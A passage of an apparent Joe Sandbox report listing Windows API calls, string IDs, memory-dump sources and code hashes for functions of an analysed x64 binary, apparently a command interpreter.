                                                                                                    • Part of subcall function 00007FF7823FA73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA77A
                                                                                                    • Part of subcall function 00007FF7823FA73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA839
                                                                                                    • Part of subcall function 00007FF7823FA73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA850
                                                                                                  • wcsrchr.MSVCRT ref: 00007FF7823F9A62
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                                                                  • String ID: %s=%s$.
                                                                                                  • API String ID: 3242694432-4275322459
                                                                                                  • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                  • Instruction ID: 9d62a2866cf6e42d9467d35e6acded80604373c5e1d6fede6b821937ea055b5e
                                                                                                  • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                  • Instruction Fuzzy Hash: 7D41B321A0D74285FE50BB11B0642BAE2A0FF857A2FE44278DD5D07BD5EEBCE845C720
                                                                                                  APIs
                                                                                                  • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823F54E6
                                                                                                  • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823F552E
                                                                                                    • Part of subcall function 00007FF7823F758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7823F6999,?,?,?,?,?,00007FF7823E8C39), ref: 00007FF7823F75AE
                                                                                                    • Part of subcall function 00007FF7823F758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7823F6999,?,?,?,?,?,00007FF7823E8C39), ref: 00007FF7823F75C6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                                  • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                                  • API String ID: 779401067-630742106
                                                                                                  • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                  • Instruction ID: a3cd6847d78814c66528aaeb8c1d4cd27765254d49b7b620a7beb39e89ac7a8d
                                                                                                  • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                  • Instruction Fuzzy Hash: AC51C732618A8282EF50AB11F4207FAE360FF84785FE05076EA4E4BE55DEBCD545C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentDirectorytowupper
                                                                                                  • String ID: :$:
                                                                                                  • API String ID: 238703822-3780739392
                                                                                                  • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                  • Instruction ID: 41561a2e0458c4dfde793559ee285623c71b2ff81a5f6e87c2dd1a0d3f856b89
                                                                                                  • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                  • Instruction Fuzzy Hash: D011005660834191EA25AB22E814279FAA0FF4D79AF95803ADE0D07B90DE7CD48AC724
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                  • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                  • API String ID: 3677997916-3870813718
                                                                                                  • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                  • Instruction ID: df1f4e79c158d831c946caa2635c9dfc182d791b15273dec871956792144501e
                                                                                                  • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                  • Instruction Fuzzy Hash: 7C112176619B41C7E7109B50E44466AFB74FB85766F904135DB8D03B68DFBCD448CB10
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memsetwcsrchr$wcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 110935159-0
                                                                                                  • Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                                  • Instruction ID: 63cabbaa24b5dcfe913404cb6f63aa5b451414a2c12400408291b83b5db81955
                                                                                                  • Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                                  • Instruction Fuzzy Hash: 40514A22B0978281FE60AB11A8243F9D390BF48BA6FA44175CE5D07FC4DE7CE545C310
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$CurrentDirectorytowupper
                                                                                                  • String ID:
                                                                                                  • API String ID: 1403193329-0
                                                                                                  • Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                                                                                  • Instruction ID: 010db040d302527119ba21ca832f8704ce228fb257f4209f618e9a1a484b9aa1
                                                                                                  • Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                                                                                  • Instruction Fuzzy Hash: A251D92AA0969195EB74AF20D4206B9B7A0FF4475AF948079CA0D07FD4DFBCE948C720
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00007FF7823D921C
                                                                                                  • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D93AA
                                                                                                    • Part of subcall function 00007FF7823D8B20: wcsrchr.MSVCRT ref: 00007FF7823D8BAB
                                                                                                    • Part of subcall function 00007FF7823D8B20: _wcsicmp.MSVCRT ref: 00007FF7823D8BD4
                                                                                                    • Part of subcall function 00007FF7823D8B20: _wcsicmp.MSVCRT ref: 00007FF7823D8BF2
                                                                                                    • Part of subcall function 00007FF7823D8B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D8C16
                                                                                                    • Part of subcall function 00007FF7823D8B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823D8C2F
                                                                                                    • Part of subcall function 00007FF7823D8B20: wcschr.MSVCRT ref: 00007FF7823D8CB3
                                                                                                    • Part of subcall function 00007FF7823E417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E41AD
                                                                                                    • Part of subcall function 00007FF7823E3060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7823D92AC), ref: 00007FF7823E30CA
                                                                                                    • Part of subcall function 00007FF7823E3060: SetErrorMode.KERNELBASE ref: 00007FF7823E30DD
                                                                                                    • Part of subcall function 00007FF7823E3060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E30F6
                                                                                                    • Part of subcall function 00007FF7823E3060: SetErrorMode.KERNELBASE ref: 00007FF7823E3106
                                                                                                  • wcsrchr.MSVCRT ref: 00007FF7823D92D8
                                                                                                  • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D9362
                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823D9373
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 3966000956-0
                                                                                                  • Opcode ID: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                                                                                  • Instruction ID: 6b8a9de0f8ebfd86ce008d58d8cc3191b19cc23044462cdb392f8c2703716835
                                                                                                  • Opcode Fuzzy Hash: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                                                                                  • Instruction Fuzzy Hash: 9C51F372A0978296EB61AF21D8642B8B3A0FB49B85FA44079CA0D07F94DF7CE555C320
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$_setjmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 3883041866-0
                                                                                                  • Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                                                                                  • Instruction ID: ef74fe5a0dbdb050723726a635994f7bb92d7e74f4f704d96372c965c9b547e3
                                                                                                  • Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                                                                                  • Instruction Fuzzy Hash: 1F51A332708B868AEB61DF20D8503E9B7A4FB45749FA04179DA4D47A49DFBCD644CB10
                                                                                                  APIs
                                                                                                  • _wcsicmp.MSVCRT ref: 00007FF7823DB4BD
                                                                                                    • Part of subcall function 00007FF7823E06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06D6
                                                                                                    • Part of subcall function 00007FF7823E06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06F0
                                                                                                    • Part of subcall function 00007FF7823E06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E074D
                                                                                                    • Part of subcall function 00007FF7823E06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E0762
                                                                                                  • _wcsicmp.MSVCRT ref: 00007FF7823DB518
                                                                                                  • _wcsicmp.MSVCRT ref: 00007FF7823DB58B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                  • String ID: ELSE$IF/?
                                                                                                  • API String ID: 3223794493-1134991328
                                                                                                  • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                  • Instruction ID: b8472a66c131434beb5ae657c32e2afd11c6a84f0992e17df96735c76175f5a3
                                                                                                  • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                  • Instruction Fuzzy Hash: D7419D65E0864391FA55BB21A4292BDA6A2FF44782FF444BDD90D07B92DEBCE804C330
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 1532185241-0
                                                                                                  • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                  • Instruction ID: 15f93165345f2057b5e0316b1d5cdcbfadc1deb326caa66e62d42598615cc22a
                                                                                                  • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                  • Instruction Fuzzy Hash: E5410932A0475187EB50AB21E45567DFAA1FB88B42FE4457DEA0E43B84CF7CE841C720
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3588551418-0
                                                                                                  • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                  • Instruction ID: b1ee25a9338f18783f50b039859f80a50fb4820fc0a03fc3825f6cb592a6ecac
                                                                                                  • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                  • Instruction Fuzzy Hash: 5B416072A08242CBEB646B51A46437DF651FB84B82FB4407DDA4E47B91CEBCE880C760
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 2123716050-0
                                                                                                  • Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                                                                                  • Instruction ID: 982e4c5d21e9497f73ca02c3207250a75fe3df7e9ebb8a349e6da4eacf1ca9c9
                                                                                                  • Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                                                                                  • Instruction Fuzzy Hash: CB41DF32709BC68AEB71AF21D8503E8A790FB49789F944078CA4D4AF99DF7CD648C310
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3114114779-0
                                                                                                  • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                  • Instruction ID: 2f92ac9b04232b24c93324170763790e9b087acbbb61b0d1e0e8fdc396078312
                                                                                                  • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                  • Instruction Fuzzy Hash: E7416C36B05B02CAE700DF65E4542ACBBA5FB88749FA44079EE0D93B54DF78D506C760
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA77A
                                                                                                  • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA7AF
                                                                                                  • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA80E
                                                                                                  • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA839
                                                                                                  • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA850
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: QueryValue$CloseErrorLastOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2240656346-0
                                                                                                  • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                  • Instruction ID: 6007433119481bc74f1af8be278ea00ea0372bcb4db6f39126c5aadd15c12b26
                                                                                                  • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                  • Instruction Fuzzy Hash: 69319232A18B4186EB50AF15F460479FBA4FF88791FA44078EA4E43B64DF7CD845CB20
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823E01B8: _get_osfhandle.MSVCRT ref: 00007FF7823E01C4
                                                                                                    • Part of subcall function 00007FF7823E01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7823EE904,?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E01D6
